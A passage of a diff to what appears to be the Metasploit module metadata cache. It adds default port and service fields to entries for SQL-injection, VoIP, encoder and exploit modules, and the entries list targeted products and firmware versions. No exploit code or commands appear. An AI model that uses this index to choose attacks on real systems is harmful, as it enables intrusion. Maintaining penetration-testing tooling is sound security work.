"arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb", @@ -31102,6 +41776,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/droptable_trigger.rb", @@ -31134,6 +41814,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb", @@ -31166,6 +41852,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb", @@ -31197,6 +41889,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb", @@ -31229,6 +41927,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb", @@ -31261,6 +41965,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb", @@ -31291,6 +42001,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb", @@ -31322,6 +42038,12 @@ "platform": "", "arch": "", "rport": "1521", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb", @@ -31351,6 +42073,12 @@ "platform": "", "arch": "", "rport": 5038, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/voip/asterisk_login.rb", @@ -31381,6 +42109,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/voip/cisco_cucdm_call_forward.rb", @@ -31411,6 +42154,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb", @@ -31440,6 +42198,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/auxiliary/voip/sip_deregister.rb", @@ -31470,6 +42234,12 @@ "platform": "", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/voip/sip_invite_spoof.rb", @@ -31500,6 +42270,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/voip/telisca_ips_lock_control.rb", @@ -31529,6 +42314,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb", @@ -31558,6 +42349,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/vsploit/malware/dns/dns_query.rb", @@ -31587,6 +42384,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb", @@ -31616,6 +42419,18 @@ "platform": "", "arch": "", "rport": "25", + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/vsploit/pii/email_pii.rb", @@ -31645,6 +42460,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/vsploit/pii/web_pii.rb", @@ -31675,6 +42496,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-23 15:20:56 +0000", "path": "/modules/encoders/cmd/brace.rb", @@ -31704,6 +42527,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/cmd/echo.rb", @@ -31733,6 +42558,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/cmd/generic_sh.rb", @@ -31763,6 +42590,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-23 15:20:38 +0000", "path": "/modules/encoders/cmd/ifs.rb", @@ -31792,6 +42621,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/cmd/perl.rb", @@ -31821,6 +42652,8 @@ "platform": "Windows", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/cmd/powershell_base64.rb", @@ -31850,6 +42683,8 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-08-28 20:17:58 +0000", "path": "/modules/encoders/cmd/printf_php_mq.rb", @@ -31879,6 +42714,8 @@ "platform": "All", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/generic/eicar.rb", @@ -31908,6 +42745,8 @@ "platform": "All", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/generic/none.rb", @@ -31938,6 +42777,8 @@ "platform": "All", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/mipsbe/byte_xori.rb", @@ -31967,6 +42808,8 @@ "platform": "All", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/mipsbe/longxor.rb", @@ -31997,6 +42840,8 @@ "platform": "All", "arch": "mipsle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/mipsle/byte_xori.rb", @@ -32026,6 +42871,8 @@ "platform": "All", "arch": "mipsle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/mipsle/longxor.rb", @@ -32055,6 +42902,8 @@ "platform": "All", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-12 17:59:12 +0000", "path": "/modules/encoders/php/base64.rb", @@ -32085,6 +42934,8 @@ "platform": "All", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/ppc/longxor.rb", @@ -32115,6 +42966,8 @@ "platform": "All", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/ppc/longxor_tag.rb", @@ -32144,6 +42997,8 @@ "platform": "All", "arch": "ruby", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-04-24 18:33:27 +0000", "path": "/modules/encoders/ruby/base64.rb", @@ -32174,6 +43029,8 @@ "platform": "All", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/sparc/longxor_tag.rb", @@ -32203,6 +43060,8 @@ "platform": "All", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x64/xor.rb", @@ -32232,6 +43091,8 @@ "platform": "All", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x64/zutto_dekiru.rb", @@ -32261,6 +43122,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/add_sub.rb", @@ -32291,6 +43154,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/alpha_mixed.rb", @@ -32321,6 +43186,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/alpha_upper.rb", @@ -32351,6 +43218,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/avoid_underscore_tolower.rb", @@ -32380,6 +43249,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/avoid_utf8_tolower.rb", @@ -32409,6 +43280,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/bloxor.rb", @@ -32438,6 +43311,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/bmp_polyglot.rb", @@ -32468,6 +43343,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/call4_dword_xor.rb", @@ -32497,6 +43374,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/context_cpuid.rb", @@ -32526,6 +43405,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/context_stat.rb", @@ -32555,6 +43436,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/context_time.rb", @@ -32584,6 +43467,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/countdown.rb", @@ -32613,6 +43498,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/fnstenv_mov.rb", @@ -32642,6 +43529,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/jmp_call_additive.rb", @@ -32671,6 +43560,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/nonalpha.rb", @@ -32700,6 +43591,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/nonupper.rb", @@ -32729,6 +43622,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/opt_sub.rb", @@ -32758,6 +43653,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/service.rb", @@ -32787,6 +43684,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/shikata_ga_nai.rb", @@ -32816,6 +43715,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/single_static_bit.rb", @@ -32846,6 +43747,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/unicode_mixed.rb", @@ -32876,6 +43779,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/encoders/x86/unicode_upper.rb", @@ -32911,6 +43816,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM AIX Version 6.1", "IBM AIX Version 7.1" @@ -32948,6 +43859,12 @@ "platform": "AIX", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM AIX Version 5.1" ], @@ -32981,6 +43898,12 @@ "platform": "AIX", "arch": "", "rport": 111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM AIX Version 6.1.4", "IBM AIX Version 6.1.3", @@ -33023,6 +43946,12 @@ "platform": "Linux", "arch": "armle, x86, x64, mipsle", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "armle", "x86", @@ -33060,6 +43989,12 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -33099,6 +44034,12 @@ "platform": "Linux", "arch": "armle", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Nexus 7 (Wi-Fi) (razor) with Android 5.0 (LRX21P)", @@ -33171,6 +44112,12 @@ "platform": "Android,Linux", "arch": "dalvik, x86, armle, mipsle", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -33205,6 +44152,12 @@ "platform": "Android", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Android ARM", "Android MIPSLE", @@ -33242,6 +44195,12 @@ "platform": "Android,Linux", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Targeting", "Default", @@ -33282,6 +44241,12 @@ "platform": "Android,Linux", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -33316,6 +44281,12 @@ "platform": "OSX", "arch": "armle", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)" ], @@ -33361,6 +44332,12 @@ "platform": "Apple_iOS", "arch": "aarch64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -33395,6 +44372,18 @@ "platform": "OSX", "arch": "armle", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)" ], @@ -33426,6 +44415,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Apple iOS" ], @@ -33460,6 +44455,21 @@ "platform": "BSDi", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "BSDi/4.3 Bruteforce" ], @@ -33496,6 +44506,12 @@ "platform": "Unix", "arch": "tty", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Solaris 2.6 - 8 (SPARC)" ], @@ -33527,6 +44543,12 @@ "platform": "Firefox", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Native Payload" ], @@ -33560,6 +44582,13 @@ "platform": "BSD", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic Targeting", "Debug", @@ -33594,6 +44623,21 @@ "platform": "BSD", "arch": "x64", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Watchguard XCS 9.2/10.0" ], @@ -33632,6 +44676,12 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "FreeBSD x86" ], @@ -33663,6 +44713,12 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Watchguard XCS 9.2/10.0" ], @@ -33695,6 +44751,21 @@ "platform": "BSD", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NetScaler Virtual Appliance 450010" ], @@ -33730,6 +44801,14 @@ "platform": "BSD", "arch": "", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Samba 2.2.x - Bruteforce" ], @@ -33763,6 +44842,12 @@ "platform": "BSD", "arch": "x86", "rport": 49, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "FreeBSD 6.2-Release Bruteforce" ], @@ -33800,6 +44885,12 @@ "platform": "BSD", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": [ "Automatic", "FreeBSD 8.2", @@ -33842,6 +44933,12 @@ "platform": "HPUX,Unix", "arch": "cmd", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -33875,6 +44972,12 @@ "platform": "Irix,Unix", "arch": "cmd", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -33907,6 +45010,21 @@ "platform": "Linux", "arch": "x86", "rport": 10080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "eScan 5.5-2 / Linux" ], @@ -33941,6 +45059,12 @@ "platform": "Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -33979,6 +45103,13 @@ "platform": "Linux", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic Targeting", "Debug", @@ -34014,6 +45145,12 @@ "platform": "Linux", "arch": "", "rport": 21, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Targeting", "Debug", @@ -34051,6 +45188,12 @@ "platform": "Linux", "arch": "", "rport": 7787, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "UT2004 Linux Build 3120", @@ -34085,6 +45228,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34122,6 +45280,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -34159,6 +45332,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "AirTies_Air5650v3TT_FW_1.0.2.0" ], @@ -34193,6 +45381,12 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Target" ], @@ -34227,6 +45421,21 @@ "platform": "Python", "arch": "python", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Alienvault USM/OSSIM <= 5.3.0" ], @@ -34261,6 +45470,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Alienvault OSSIM 4.3" ], @@ -34293,6 +45517,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Apache Continuum <= 1.4.2" ], @@ -34330,6 +45569,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 5984, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Apache CouchDB version 1.x", @@ -34364,6 +45618,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Astium 2.1" ], @@ -34399,6 +45668,21 @@ "platform": "Unix", "arch": "cmd", "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "AsusWRT < v3.0.0.4.384.10007" ], @@ -34434,6 +45718,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34477,15 +45776,30 @@ "platform": "Linux,Unix", "arch": "cmd, armle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix In-Memory", "Linux Dropper" ], - "mod_time": "2018-07-31 19:49:17 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/exploits/linux/http/axis_srv_parhand_rce.rb", "is_install_path": true, "ref_name": "linux/http/axis_srv_parhand_rce", - "check": false, + "check": true, "post_auth": false, "default_credential": false, "notes": { @@ -34515,6 +45829,21 @@ "platform": "Linux", "arch": "mipsle", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Belkin Play N750 DB Wireless Dual-Band N+ Router, F9K1103, firmware 1.10.16.m" ], @@ -34550,6 +45879,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Centreon Enterprise Server 2.2" ], @@ -34582,6 +45926,21 @@ "platform": "Python", "arch": "python", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -34615,6 +45974,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34648,6 +46022,21 @@ "platform": "Linux", "arch": "x86", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Cisco Firepower Management Console 6.0.1 (build 1213)" ], @@ -34679,6 +46068,21 @@ "platform": "Python", "arch": "python", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34710,6 +46114,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Python" ], @@ -34745,6 +46164,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -34778,6 +46212,21 @@ "platform": "Python", "arch": "python", "rport": 3001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34815,6 +46264,21 @@ "platform": "Linux", "arch": "mipsle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "D-Link DIR-645 1.03" ], @@ -34852,6 +46316,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34888,6 +46367,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux mipsle Payload" ], @@ -34919,6 +46413,23 @@ "platform": "Unix", "arch": "cmd", 